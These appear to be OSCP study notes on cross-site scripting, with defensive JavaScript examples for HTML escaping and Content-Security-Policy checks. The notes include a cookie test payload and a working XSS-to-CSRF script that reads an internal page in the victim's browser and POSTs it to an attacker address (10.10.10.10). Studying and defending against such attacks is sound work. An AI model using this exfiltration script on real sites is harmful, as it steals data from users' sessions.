OSCP 2022 Materials
XSS

Cross-Site Scripting (XSS) is a web attack in which the attacker injects malicious JavaScript into a page that the application serves to other users; the injected script then runs in the victim's browser, under the application's origin, for the attacker's benefit.

Stealing cookies of the current user

<script>alert(document.cookie)</script>

Places to check for XSS

  • All fields in the form submission
  • User-Agent header
  • Referer header
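The list above names the reflection points to test; the following is an added example (not code from these notes) that shows why those points matter and what closes them. It mocks a "visitor log" page that reflects a form field, the User-Agent and the Referer, rendered once without encoding and once with HTML escaping, and feeds it a constructed request carrying the cookie test payload from this page.

```javascript
// Added example (not from these notes): a mock "visitor log" page that reflects the
// places the list above names (form fields, User-Agent, Referer), rendered once
// without encoding and once with HTML escaping. The request object is constructed.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Encode the characters that can break out of an HTML text or quoted-attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable renderer: untrusted values are interpolated straight into markup.
function renderVisitorLogUnsafe(req) {
  return [
    `<li>name: ${req.form.name}</li>`,
    `<li>user-agent: ${req.headers["user-agent"]}</li>`,
    `<li>referer: ${req.headers["referer"]}</li>`,
  ].join("\n");
}

// Hardened renderer: the same page with every untrusted value escaped.
function renderVisitorLogSafe(req) {
  return [
    `<li>name: ${escapeHtml(req.form.name)}</li>`,
    `<li>user-agent: ${escapeHtml(req.headers["user-agent"])}</li>`,
    `<li>referer: ${escapeHtml(req.headers["referer"])}</li>`,
  ].join("\n");
}

// Check used by this demo: does the output still contain a live <script> element?
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// Constructed request carrying the page's test payload in each reflected location.
const PAYLOAD = "<script>alert(document.cookie)</script>";
const SAMPLE_REQUEST = {
  form: { name: PAYLOAD },
  headers: { "user-agent": PAYLOAD, referer: "http://example.invalid/?q=" + PAYLOAD },
};

console.log("unsafe:\n" + renderVisitorLogUnsafe(SAMPLE_REQUEST));
console.log("safe:\n" + renderVisitorLogSafe(SAMPLE_REQUEST));
```

The escaping here is only correct for the HTML text and quoted-attribute contexts; a value placed inside a script block, a URL, or an event-handler attribute needs that context's own encoding. Independently of output encoding, marking the session cookie HttpOnly keeps it out of document.cookie even when a script does run.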

XSS to CSRF

  • Create requests with XMLHttpRequest to fetch a page from inside the victim's browser (here an internal host)

var url1 = "http://internal.dnoscp.htb";
var req1 = new XMLHttpRequest();
req1.open("GET", url1, false); // open(<request method>, <target url>, <async?>): false blocks until the response arrives
req1.send();
var resp1 = req1.responseText;

  • With the content of the requested page stored in the variable resp1, a second request from the same script sends it to the attacker's machine

var url2 = "http://10.10.10.10";
var req2 = new XMLHttpRequest();
req2.open("POST", url2, false); // the second argument is the URL string, not the request object
req2.send(resp1);
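The chain above has two halves: the injected inline script has to run, and its second request has to reach an external host. Both are governed by Content-Security-Policy, so the following added example (not code from these notes) parses a CSP header and reports, for a constructed permissive policy and a constructed strict one, whether inline script would execute (script-src) and whether an XMLHttpRequest to the attacker host from the snippet could be sent (connect-src). The application origin is an assumed value; source matching is simplified (no host wildcards, no 'strict-dynamic').

```javascript
// Added example (not from these notes): parses a Content-Security-Policy header and
// asks two questions about the XMLHttpRequest exfiltration above: would the injected
// inline <script> run at all (script-src), and could its second request reach an
// external host such as 10.10.10.10 (connect-src). Policies and origins are constructed;
// source matching is simplified (no host wildcards, no 'strict-dynamic').

// Turn "a b; c d e" into { a: ["b"], c: ["d", "e"] }; keywords and hosts are case-insensitive.
function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(";")) {
    const [name, ...sources] = directive.trim().split(/\s+/).filter(Boolean);
    if (name) policy[name.toLowerCase()] = sources.map((s) => s.toLowerCase());
  }
  return policy;
}

// A fetch directive that is absent falls back to default-src; null means unrestricted.
function effectiveSources(policy, directive) {
  return policy[directive] ?? policy["default-src"] ?? null;
}

// Inline script runs only if 'unsafe-inline' is listed and no nonce/hash source
// is present (a nonce or hash makes browsers ignore 'unsafe-inline').
function allowsInlineScript(policy) {
  const sources = effectiveSources(policy, "script-src");
  if (sources === null) return true;
  const hasNonceOrHash = sources.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  return sources.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// Could script running on pageOrigin send an XHR/fetch to targetOrigin under this policy?
function allowsConnectTo(policy, pageOrigin, targetOrigin) {
  const sources = effectiveSources(policy, "connect-src");
  if (sources === null) return true;
  const target = new URL(targetOrigin);
  return sources.some(
    (s) =>
      s === "*" ||
      (s === "'self'" && target.origin === new URL(pageOrigin).origin) ||
      (/^[a-z][a-z0-9+.-]*:$/.test(s) && target.protocol === s) ||
      s === target.origin
  );
}

// Constructed policies: a permissive one and one that blocks both halves of the chain.
const PERMISSIVE_CSP = "script-src 'self' 'unsafe-inline'";
const STRICT_CSP = "default-src 'none'; script-src 'self' 'nonce-R4nd0mV4lu3'; connect-src 'self'";
const PAGE_ORIGIN = "https://app.example.invalid"; // assumed vulnerable application origin
const EXFIL_ORIGIN = "http://10.10.10.10";          // attacker host from the snippet above

for (const [label, header] of [["permissive", PERMISSIVE_CSP], ["strict", STRICT_CSP]]) {
  const policy = parseCsp(header);
  console.log(label, "| inline script runs:", allowsInlineScript(policy),
              "| XHR to attacker host allowed:", allowsConnectTo(policy, PAGE_ORIGIN, EXFIL_ORIGIN));
}
```

A policy with a nonce on script-src stops the injected inline script before the first request is made; connect-src 'self' is the second line of defence, limiting where any script that does run may send data. Checking a target's CSP this way also tells a tester quickly why a payload that fires in one application is silent in another.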